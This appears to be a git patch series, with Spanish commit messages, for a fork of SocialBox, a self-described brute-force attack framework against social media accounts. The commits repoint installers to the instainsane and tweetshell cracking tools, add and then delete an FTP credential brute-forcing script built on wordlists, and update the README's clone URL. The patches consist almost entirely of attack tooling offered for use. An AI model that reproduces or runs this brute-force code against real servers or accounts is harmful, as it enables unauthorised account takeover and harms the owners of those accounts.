From 3dcc319ec23c0c287db032c7721a4eb6f59dfa74 Mon Sep 17 00:00:00 2001 From: Ignacio Vega Date: Wed, 26 May 2021 18:19:29 +0200 Subject: [PATCH 1/4] Actualizacion --- install-sb.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/install-sb.sh b/install-sb.sh index 85ef560..b1a0b8f 100644 --- a/install-sb.sh +++ b/install-sb.sh @@ -15,14 +15,14 @@ else cd .. fi #Instagram -git clone https://github.com/thelinuxchoice/instainsane.git +git clone https://github.com/permikomnaskaltara/instainsane.git cd instainsane chmod +x instainsane.sh chmod +x install.sh sudo ./install.sh cd .. #Twitter -git clone https://github.com/thelinuxchoice/tweetshell.git +git clone https://github.com/Mehran/tweetshell.git cd tweetshell chmod +x tweetshell.sh chmod +x install.sh From 3dda244ef0ed28ce7487d642e84b8820d20b16fc Mon Sep 17 00:00:00 2001 From: Ignacio Vega Date: Wed, 26 May 2021 19:02:25 +0200 Subject: [PATCH 2/4] =?UTF-8?q?A=C3=B1adido=20script?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- scripts/hack.py | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 scripts/hack.py diff --git a/scripts/hack.py b/scripts/hack.py new file mode 100644 index 0000000..0cec513 --- /dev/null +++ b/scripts/hack.py @@ -0,0 +1,31 @@ +import sys +import ftplib + + +def bruteforce_ftp(target, usuario, contrasena): + ftp = ftplib.FTP(target) + try: + ftp.login(usuario, contrasena) + ftp.quit() + print('(+) Se encontraron las credenciales') + print('{}:{}'.format(usuario, contrasena)) + except: + print("Fallo la Autenticacion {}:{}".format(usuario, contrasena)) + + +def main(): + target = "" + users = open("user.txt", 'r') + users = users.read().split("\n") + passwords = open("pass.txt", 'r') + passwords = passwords.read().split("\n") + + for user in users: + for password in passwords: + bruteforce_ftp(target, user,password) + + if name == 'main': + try: + main() + except KeyboardInterrupt: + sys.exit() From de0291e874b755fa771bfd1d263b7daa24b3acbc Mon Sep 17 00:00:00 2001 From: Ignacio Vega Date: Sat, 29 May 2021 18:48:23 +0200 Subject: [PATCH 3/4] delete folder scripts --- scripts/hack.py | 31 ------------------------------- 1 file changed, 31 deletions(-) delete mode 100644 scripts/hack.py diff --git a/scripts/hack.py b/scripts/hack.py deleted file mode 100644 index 0cec513..0000000 --- a/scripts/hack.py +++ /dev/null @@ -1,31 +0,0 @@ -import sys -import ftplib - - -def bruteforce_ftp(target, usuario, contrasena): - ftp = ftplib.FTP(target) - try: - ftp.login(usuario, contrasena) - ftp.quit() - print('(+) Se encontraron las credenciales') - print('{}:{}'.format(usuario, contrasena)) - except: - print("Fallo la Autenticacion {}:{}".format(usuario, contrasena)) - - -def main(): - target = "" - users = open("user.txt", 'r') - users = users.read().split("\n") - passwords = open("pass.txt", 'r') - passwords = passwords.read().split("\n") - - for user in users: - for password in passwords: - bruteforce_ftp(target, user,password) - - if name == 'main': - try: - main() - except KeyboardInterrupt: - sys.exit() From 44ee4d52f0ec7c9b1becf24c717b2ec31b8ca1fe Mon Sep 17 00:00:00 2001 From: Ignacio Vega <39027482+ivegamerayo@users.noreply.github.com> Date: Sun, 30 May 2021 00:47:36 +0200 Subject: [PATCH 4/4] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index bf3523d..da3aa66 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ SocialBox is a Bruteforce Attack Framework [ Facebook , Gmail , Instagram ,Twitt # Installation ``` sudo apt-get install git -git clone https://github.com/TunisianEagles/SocialBox.git +git clone https://github.com/ivegamerayo/SocialBox.git cd SocialBox chmod +x SocialBox.sh chmod +x install-sb.sh